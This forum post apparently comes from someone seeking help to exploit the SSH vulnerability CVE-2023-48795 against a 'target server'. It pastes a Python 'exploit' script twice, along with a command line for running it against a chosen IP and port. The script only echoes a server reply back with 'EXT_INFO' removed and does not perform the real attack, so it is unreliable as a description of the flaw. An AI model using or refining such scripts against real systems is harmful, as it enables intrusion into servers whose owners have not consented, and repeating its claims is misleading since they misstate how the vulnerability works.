Does anyone know how to exploit the CVE-2023-48795 vulnerability?
import socket
import argparse
def manipulate_handshake(data):
return data.replace(b"EXT_INFO", b"") if b"EXT_INFO" in data else data
def exploit(target, port):
try:
print(f"[+] Connecting to {target}:{port}")
sock = socket.create_connection((target, port))
print("[+] Sending handshake...")
sock.sendall(b"SSH-2.0-OpenSSH_8.4\r\n")
response = sock.recv(1024)
print(f"[+] Received: {response.decode().strip()}")
manipulated = manipulate_handshake(response)
print("[+] Sending manipulated data...")
sock.sendall(manipulated)
final_response = sock.recv(1024)
print(f"[+] Server response: {final_response.decode().strip()}")
sock.close()
except Exception as e:
print(f"[-] Failed: {e}")
def main():
parser = argparse.ArgumentParser(description="OpenSSH CVE-2023-48795 Exploit Example")
parser.add_argument("--target", required=True, help="Target IP or hostname")
parser.add_argument("--port", type=int, default=22, help="SSH port (default: 22)")
args = parser.parse_args()
exploit(args.target, args.port)
if __name__ == "__main__":
main()
Bro, what should I do next to connect to the target server?Python:import socket import argparse def manipulate_handshake(data): return data.replace(b"EXT_INFO", b"") if b"EXT_INFO" in data else data def exploit(target, port): try: print(f"[+] Connecting to {target}:{port}") sock = socket.create_connection((target, port)) print("[+] Sending handshake...") sock.sendall(b"SSH-2.0-OpenSSH_8.4\r\n") response = sock.recv(1024) print(f"[+] Received: {response.decode().strip()}") manipulated = manipulate_handshake(response) print("[+] Sending manipulated data...") sock.sendall(manipulated) final_response = sock.recv(1024) print(f"[+] Server response: {final_response.decode().strip()}") sock.close() except Exception as e: print(f"[-] Failed: {e}") def main(): parser = argparse.ArgumentParser(description="OpenSSH CVE-2023-48795 Exploit Example") parser.add_argument("--target", required=True, help="Target IP or hostname") parser.add_argument("--port", type=int, default=22, help="SSH port (default: 22)") args = parser.parse_args() exploit(args.target, args.port) if __name__ == "__main__": main()
python CVE-2023-48795.py --target <IP> --port <PORT>
![]()
github /TrixSec/CVE-2023-48795[+] Sending handshake...